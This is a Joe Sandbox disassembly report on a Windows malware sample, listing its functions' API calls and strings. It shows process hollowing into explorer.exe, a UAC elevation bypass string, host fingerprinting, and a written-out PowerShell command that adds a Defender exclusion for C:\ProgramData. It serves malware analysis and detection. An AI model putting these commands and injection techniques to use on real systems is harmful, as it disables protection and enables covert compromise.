Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Heap$FreeProcess$AttributesFileUser$CryptNamewnsprintf$AcquireAddressContextDevicesDisplayEnumErrorInformationInitializeLastPolicyProclstrcpylstrlenwsprintf$AllocBufferByteCharCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInfoLangMemoryModuleMultiMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWideWow64
String ID:
API String ID: 1026145915-0
Opcode ID: cb62bac3a13225769f495d9572632340b0265a138fc7d5ab6a001d9063cea412
Instruction ID: 83b0dbd757b5ed14c466f706a1779a7dbdfa34d4e17aec9e29eff825b5cc6aab
Opcode Fuzzy Hash: cb62bac3a13225769f495d9572632340b0265a138fc7d5ab6a001d9063cea412
Instruction Fuzzy Hash: 2B01BB5C6011E222EE3CF59F50A52B43942FFC0321FC8812A6BD66BDE58D081E83425F

Function 00F01710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F01110: GetModuleHandleA.KERNEL32(kernel32), ref: 00F0111B
Part of subcall function 00F01110: GetModuleHandleW.KERNEL32(00000000), ref: 00F01162

GetUserDefaultLCID.KERNELBASE ref: 00F01824

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: HandleModule$DefaultUser
String ID:
API String ID: 3008646163-0
Opcode ID: afcf5c4bf59e257c8febcb4b70a17df61dde1a14f9ba1bb9774f2f9a67310349
Instruction ID: 4e078d1f90623586b7a9b0cbe5a3c49f85e669fe84893f053b93a33df8858ed9
Opcode Fuzzy Hash: afcf5c4bf59e257c8febcb4b70a17df61dde1a14f9ba1bb9774f2f9a67310349
Instruction Fuzzy Hash: 3841F7B5D002099FDF04DF98C881AEEB7F5BF48304F148559E515A7381E735AA41EFA1

Function 00F03C30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F03670: task.LIBCPMTD ref: 00F03748

LPtoDP.GDI32(00000000,0056AA94,0538CD39), ref: 00F03C61
GetLastError.KERNEL32 ref: 00F03C6B
ExitProcess.KERNEL32 ref: 00F03C78
BuildCommDCBAndTimeoutsA.KERNEL32(eruigoreh ertoerh634643,00000000,00000000), ref: 00F03C87
GetCurrentProcess.KERNEL32(00000000), ref: 00F03C93
TerminateProcess.KERNEL32(00000000), ref: 00F03C9A

Strings

eruigoreh ertoerh634643, xrefs: 00F03C82

Memory Dump Source

Source File: 00000000.00000002.1735690091.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1735640665.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735736176.0000000000F13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735775977.0000000000F1B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1735818157.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_JT1yqn67un.jbxd

Similarity

API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeoutstask
String ID: eruigoreh ertoerh634643
API String ID: 3960728841-1078997068
Opcode ID: c829ae695342a9e773f273070308254b380cb90554b7ce41450870d23ff90716
Instruction ID: 4cb01b7b162cac7176392f0559c1495b8a27ef6ca14fd1a036d208d598857455
Opcode Fuzzy Hash: c829ae695342a9e773f273070308254b380cb90554b7ce41450870d23ff90716
Instruction Fuzzy Hash: 32016D70A4020CABDB10EFF19D0AB9D7BF8AB08745F11C055E502E61D0DB74EA04FB21

Non-executed Functions

Function 005E5FD0 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll), ref: 005E5FED
GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005E6001
GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005E600C
GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005E6017
GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005E6022
GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005E602D
GetTempPathW.KERNEL32(000000F6,?), ref: 005E6046

Part of subcall function 005E26A0: GetTickCount.KERNEL32 ref: 005E26A2

wnsprintfW.SHLWAPI ref: 005E6081
PathCombineW.SHLWAPI(?,?,?), ref: 005E609B
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005E60C2
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005E60E6
SetEndOfFile.KERNEL32(00000000), ref: 005E60E9
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005E60F6
wnsprintfW.SHLWAPI ref: 005E6114
RtlInitUnicodeString.NTDLL(?,?), ref: 005E612A
RtlInitUnicodeString.NTDLL(?,?), ref: 005E6137
GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 005E6176
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005E61C5
WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 005E620F
FlushFileBuffers.KERNEL32(00000000), ref: 005E6217
SetEndOfFile.KERNEL32(00000000), ref: 005E621E
NtQueryInformationProcess.NTDLL ref: 005E6233
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005E625B
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 005E62B2
WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005E62EE
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 005E62FC
NtClose.NTDLL ref: 005E6335
NtClose.NTDLL ref: 005E6346
NtClose.NTDLL ref: 005E6350
CloseHandle.KERNEL32(00000000), ref: 005E6353

Strings

NtCreateThreadEx, xrefs: 005E6024
NtCreateProcessEx, xrefs: 005E6003
.exe, xrefs: 005E605F
NtCreateSection, xrefs: 005E5FFB
%08x%s, xrefs: 005E6070
ntdll, xrefs: 005E5FE5
RtlDestroyProcessParameters, xrefs: 005E6019
"%s", xrefs: 005E6103
RtlCreateProcessParametersEx, xrefs: 005E600E

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
API String ID: 3548791621-756185880
Opcode ID: 8f9e1f58d486a5ccdb63c77c566fc9e5a840895016d637a49bb47eefd01771fb
Instruction ID: 0e9b18345229201a41b300cce978d8d2d4bc16cfc1e01acf598afeb34071bf61
Opcode Fuzzy Hash: 8f9e1f58d486a5ccdb63c77c566fc9e5a840895016d637a49bb47eefd01771fb
Instruction Fuzzy Hash: 78B17C71A40259ABEB24CBA5CC89FAFBBBCBF18740F104455F654FB190D770AA04CB54

Function 005E7920 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 265
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LsaOpenPolicy.ADVAPI32(00000000,005EA060,00000001,?), ref: 005E795C
LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005E7975
GetProcessHeap.KERNEL32(00000008,?), ref: 005E7991
HeapAlloc.KERNEL32(00000000), ref: 005E7994
LsaFreeMemory.ADVAPI32(?), ref: 005E79DB
LsaClose.ADVAPI32(?), ref: 005E79E4
GetComputerNameW.KERNEL32(?,?), ref: 005E7A00
GetUserNameW.ADVAPI32(?,00000101), ref: 005E7A11
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E7A32
GetProcessHeap.KERNEL32(00000008,00000001), ref: 005E7A48
HeapAlloc.KERNEL32(00000000), ref: 005E7A4B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 005E7A75
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 005E7A97
GetProcessHeap.KERNEL32(00000008,00000001), ref: 005E7AAD
HeapAlloc.KERNEL32(00000000), ref: 005E7AB0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 005E7AD5
wsprintfA.USER32 ref: 005E7B56
wsprintfA.USER32 ref: 005E7B81
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E7BDA
HeapFree.KERNEL32(00000000), ref: 005E7BDD
GetProcessHeap.KERNEL32(00000000,?), ref: 005E7BE9
HeapFree.KERNEL32(00000000), ref: 005E7BEC
GetProcessHeap.KERNEL32(00000000,?), ref: 005E7BF8
HeapFree.KERNEL32(00000000), ref: 005E7BFB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 005E7C04
HeapFree.KERNEL32(00000000), ref: 005E7C07

Strings

%s|%d.%d (%d)|%s|%s|%S, xrefs: 005E7B7B
%d|%s|%.16s|, xrefs: 005E7B50
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 005E7AE2

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$ByteCharMultiWide$Alloc$NamePolicywsprintf$CloseComputerInformationMemoryOpenQueryUser
String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%s|%s|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 4008773985-1210213088
Opcode ID: acbc2ec0987fe9cd1dfe757780649167dcbb9ff69de8133b6b2196ca3cd03740
Instruction ID: 03fd9989bdec0e6e2e07c20fd842fdeb0560812df5ad6b4f98d9f90da2210318
Opcode Fuzzy Hash: acbc2ec0987fe9cd1dfe757780649167dcbb9ff69de8133b6b2196ca3cd03740
Instruction Fuzzy Hash: 6D91C371A0434DAEEB189BA6CC45FAF7BBDFF48700F140165E694EB191DB70A905CB60

Function 005E94B0 Relevance: 50.9, APIs: 21, Strings: 8, Instructions: 192
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,NtQueryInformationProcess,74DF0EE0,?), ref: 005E94CC
GetProcAddress.KERNEL32(00000000), ref: 005E94D5
GetModuleHandleW.KERNEL32(ntdll.dll,RtlEnterCriticalSection), ref: 005E94E4
GetProcAddress.KERNEL32(00000000), ref: 005E94E7
GetModuleHandleW.KERNEL32(ntdll.dll,RtlLeaveCriticalSection), ref: 005E94F6
GetProcAddress.KERNEL32(00000000), ref: 005E94F9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString), ref: 005E9508
GetProcAddress.KERNEL32(00000000), ref: 005E950B
GetCurrentProcessId.KERNEL32 ref: 005E9539
OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 005E9547
ReadProcessMemory.KERNEL32(00000000,?,4t^,00000004,00000000), ref: 005E9578
ReadProcessMemory.KERNEL32(00000000,4t^,?,00000004,00000000), ref: 005E9592
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 005E95A8
StrNCatW.SHLWAPI(?,\explorer.exe,00000105), ref: 005E95BF
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 005E95D3
lstrcpyW.KERNEL32(00000000,?), ref: 005E95E4
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005E9621
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 005E964D
ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000), ref: 005E966C
CloseHandle.KERNEL32(00000000), ref: 005E96AF
StrCmpIW.SHLWAPI(?,?), ref: 005E96C3

Strings

\explorer.exe, xrefs: 005E95B3
ntdll.dll, xrefs: 005E94C7, 005E94DC, 005E94EE, 005E9500
NtQueryInformationProcess, xrefs: 005E94C2
RtlInitUnicodeString, xrefs: 005E94FB
explorer.exe, xrefs: 005E9605, 005E969A
4t^, xrefs: 005E956B, 005E958A, 005E95EA, 005E95F3, 005E9602, 005E9627, 005E9675, 005E96A5, 005E9572, 005E9590
RtlLeaveCriticalSection, xrefs: 005E94E9
RtlEnterCriticalSection, xrefs: 005E94D7

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Process$HandleModule$AddressMemoryProcRead$AllocCloseCurrentDirectoryFileNameOpenVirtualWindowslstrcpy
String ID: 4t^$NtQueryInformationProcess$RtlEnterCriticalSection$RtlInitUnicodeString$RtlLeaveCriticalSection$\explorer.exe$explorer.exe$ntdll.dll
API String ID: 2609293587-3575179387
Opcode ID: a68ae02401f85688989803f09346b5f0123b0afda9c9d465599119c5b007514a
Instruction ID: 4bbb79e08559384a72729f4d742cd77a3bd80c6b538ee3e2a79e634b3dff059d
Opcode Fuzzy Hash: a68ae02401f85688989803f09346b5f0123b0afda9c9d465599119c5b007514a
Instruction Fuzzy Hash: 0B616EB2A40259ABDB14EBA5CC89FAEBBBCFF44711F100152F654E7190D770EA45CB60

Function 005E72E0 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 154
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,005E92E8), ref: 005E7306
ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,005E92E8), ref: 005E7319
lstrlenW.KERNEL32(?,?,?,?,005E92E8), ref: 005E7322
ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,005E92E8), ref: 005E733D
GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,005E92E8), ref: 005E734B
GetLastError.KERNEL32(?,?,?,005E92E8), ref: 005E7355
wnsprintfW.SHLWAPI ref: 005E7377
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005E738F
wnsprintfW.SHLWAPI ref: 005E73A9
SetFileAttributesW.KERNEL32(?,00000006), ref: 005E73C5
lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 005E73D7
GetUserNameW.ADVAPI32(?,?), ref: 005E73F6
NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 005E740B
NetApiBufferFree.NETAPI32(00000000), ref: 005E7420
CoInitializeEx.OLE32(00000000,?), ref: 005E7437
lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 005E7451
wsprintfW.USER32 ref: 005E748E
CoGetObject.OLE32(?,005E2508,005E2508,00000000), ref: 005E74AB
CoUninitialize.OLE32 ref: 005E74EB

Strings

%ProgramW6432%, xrefs: 005E7314
%ProgramFiles%, xrefs: 005E7338
"%s", xrefs: 005E7398
%ComSpec%, xrefs: 005E7301
Elevation:Administrator!new:%s, xrefs: 005E7481
%%ProgramData%%\r%Sr.js, xrefs: 005E736C
$, xrefs: 005E747A
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 005E743D, 005E746F
/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'", xrefs: 005E73CB

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Userlstrlenwnsprintf$AttributesBufferDirectoryErrorFileFreeInfoInitializeLastNameObjectSystemUninitializeWow64lstrcpywsprintf
String ID: "%s"$$$%%ProgramData%%\r%Sr.js$%ComSpec%$%ProgramFiles%$%ProgramW6432%$/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"$Elevation:Administrator!new:%s${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 3941589607-3081872691
Opcode ID: 6e421c017e1034fdc2ba9ed3716ffcf1a359b9fd641dc6e7dcbfb6117c5432d5
Instruction ID: e88f6b1b0379ce06505c8e29f20d75d2c91f287d56f18ff8e0d86032de6f15fa
Opcode Fuzzy Hash: 6e421c017e1034fdc2ba9ed3716ffcf1a359b9fd641dc6e7dcbfb6117c5432d5
Instruction Fuzzy Hash: 4C5141B190029CABEB24DB95DC89FDE7BBCFB48701F000095E689E7190D7709A88CF61

Function 005E5C60 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 277
injectionthreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 005E5C83
GetProcAddress.KERNEL32(00000000), ref: 005E5C8A
CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 005E5D4D
NtQueryInformationProcess.NTDLL ref: 005E5D6A
ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005E5D84
GetThreadContext.KERNEL32(?,00010007), ref: 005E5D94
VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 005E5DC8
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 005E5DF2
WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 005E5E2B
ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005E5F0B
WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005E5F23
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 005E5F6B
SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 005E5F86
ResumeThread.KERNEL32(?,?,?,00000000), ref: 005E5F8F
CloseHandle.KERNEL32(?), ref: 005E5F9E
CloseHandle.KERNEL32(00000000), ref: 005E5FA3

Strings

C:\Windows\system32\certutil.exe, xrefs: 005E5CC0
C:\Windows\system32\explorer.exe, xrefs: 005E5CD0, 005E5D4C
.reloc, xrefs: 005E5E81
NtUnmapViewOfSection, xrefs: 005E5C79
ntdll, xrefs: 005E5C7E

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
API String ID: 918112823-4001407722
Opcode ID: 79ebd2e449dd363d96aeda1d8746ec1eb4e61c02241cd1cbd143227e0dc4ccd8
Instruction ID: e7207bf84b130895059a84b2523b5322c37bcd6de563aa576d9d11c7cf199a9a
Opcode Fuzzy Hash: 79ebd2e449dd363d96aeda1d8746ec1eb4e61c02241cd1cbd143227e0dc4ccd8
Instruction Fuzzy Hash: 09B19071A00258AFDF18CFA9CC84BAEBBB5FF48305F1440A9E949EB291E7319D45DB14

Function 005E7C30 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 432memorystringCOMMON

Download Yara Rule

APIs

StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005E7C7A
wnsprintfA.SHLWAPI ref: 005E7D12
wsprintfA.USER32 ref: 005E7D39
lstrcmpA.KERNEL32(?,Start), ref: 005E7FBB
EnterCriticalSection.KERNEL32(005EA088), ref: 005E8011
GetProcessHeap.KERNEL32(00000008,?), ref: 005E8078
HeapAlloc.KERNEL32(00000000), ref: 005E807F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 005E808A
HeapReAlloc.KERNEL32(00000000), ref: 005E8091
LeaveCriticalSection.KERNEL32(005EA088), ref: 005E80E8

Part of subcall function 005E5FD0: GetModuleHandleW.KERNEL32(ntdll), ref: 005E5FED
Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005E6001
Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005E600C
Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005E6017
Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005E6022
Part of subcall function 005E5FD0: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005E602D
Part of subcall function 005E5FD0: GetTempPathW.KERNEL32(000000F6,?), ref: 005E6046
Part of subcall function 005E5FD0: wnsprintfW.SHLWAPI ref: 005E6081
Part of subcall function 005E5FD0: PathCombineW.SHLWAPI(?,?,?), ref: 005E609B
Part of subcall function 005E5FD0: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005E60C2
Part of subcall function 005E5FD0: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005E60E6
Part of subcall function 005E5FD0: SetEndOfFile.KERNEL32(00000000), ref: 005E60E9
Part of subcall function 005E5FD0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005E60F6
Part of subcall function 005E5FD0: wnsprintfW.SHLWAPI ref: 005E6114

GetProcessHeap.KERNEL32(00000000,?), ref: 005E8107
HeapFree.KERNEL32(00000000), ref: 005E810E

Strings

%s|%s, xrefs: 005E7D33
%d|%s|%.16s|, xrefs: 005E7D01
Start, xrefs: 005E7FB5
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 005E7CB0

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
API String ID: 851647271-3778496198
Opcode ID: 2c876d91c14b68cd5f48db1d5678879ed42c22b54e3fc62e7c05ba2cbb3b5374
Instruction ID: 7177d6663ae62d436636a1a0c7e007d54a6cd99b9892d4b1437fab88c8475cef
Opcode Fuzzy Hash: 2c876d91c14b68cd5f48db1d5678879ed42c22b54e3fc62e7c05ba2cbb3b5374
Instruction Fuzzy Hash: E6E10671A086DA8FDB2D8F768C8477A7FA6BF99300F1841ADD8C59B242DB309D45C750

Function 005E8710 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 121encryptionfilesynchronizationCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(005EA088), ref: 005E8732

Part of subcall function 005E71A0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005E71CA
Part of subcall function 005E71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005E71E6
Part of subcall function 005E71A0: GetProcessHeap.KERNEL32(00000008,?), ref: 005E71F9
Part of subcall function 005E71A0: HeapAlloc.KERNEL32(00000000), ref: 005E7200
Part of subcall function 005E71A0: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005E721D
Part of subcall function 005E71A0: RegCloseKey.ADVAPI32(80000002), ref: 005E7229

GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005E875F
StringFromGUID2.OLE32(?,?,00000080), ref: 005E87B8
wsprintfA.USER32 ref: 005E87CF
CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005E87E3
GetLastError.KERNEL32 ref: 005E87EE
ExitProcess.KERNEL32 ref: 005E88F3

Part of subcall function 005E26A0: GetTickCount.KERNEL32 ref: 005E26A2

WSAStartup.WS2_32(00000202,?), ref: 005E882C
CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005E8845
CryptAcquireContextA.ADVAPI32(005EA4F4,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005E8861
CoInitializeEx.OLE32(00000000,00000000), ref: 005E88AC
ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 005E88C3
CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 005E88E2

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 005E8839, 005E8856
C:\, xrefs: 005E875A
%temp%\%paths%, xrefs: 005E88BE

Memory Dump Source

Source File: 00000000.00000002.1735137661.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1735113174.00000000005E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1735167254.00000000005EB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_JT1yqn67un.jbxd

Yara matches

Similarity

API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 267019445-2941900213
Opcode ID: e9f7e2b38d33cb278968a44d803aa095918bce01b58bcef2783568c33a427106
Instruction ID: 338eb5ec96490f97fc2b2a06ccc7f366bccfb87b4925767c0b442fc82c2d892f
Opcode Fuzzy Hash: e9f7e2b38d33cb278968a44d803aa095918bce01b58bcef2783568c33a427106
Instruction Fuzzy Hash: F2410974A40388AFF71CDB61DC8EFAA3B78BB14701F104065F689EE1D1EBB066489B55

Function 005E6410 Relevance: 25.6, APIs: 17, Instructions: 148networkmemoryCOMMON

Download Yara Rule

APIs

inet_pton.WS2_32(00000002,?,?), ref: 005E6430
htons.WS2_32(?), ref: 005E644C
inet_pton.WS2_32(00000002,?,?), ref: 005E645E
htons.WS2_32(?), ref: 005E6465
socket.WS2_32(00000002,00000001,00000006), ref: 005E6478
connect.WS2_32(00000000,?,00000010), ref: 005E6493
socket.WS2_32(00000002,00000001,00000006), ref: 005E64A6
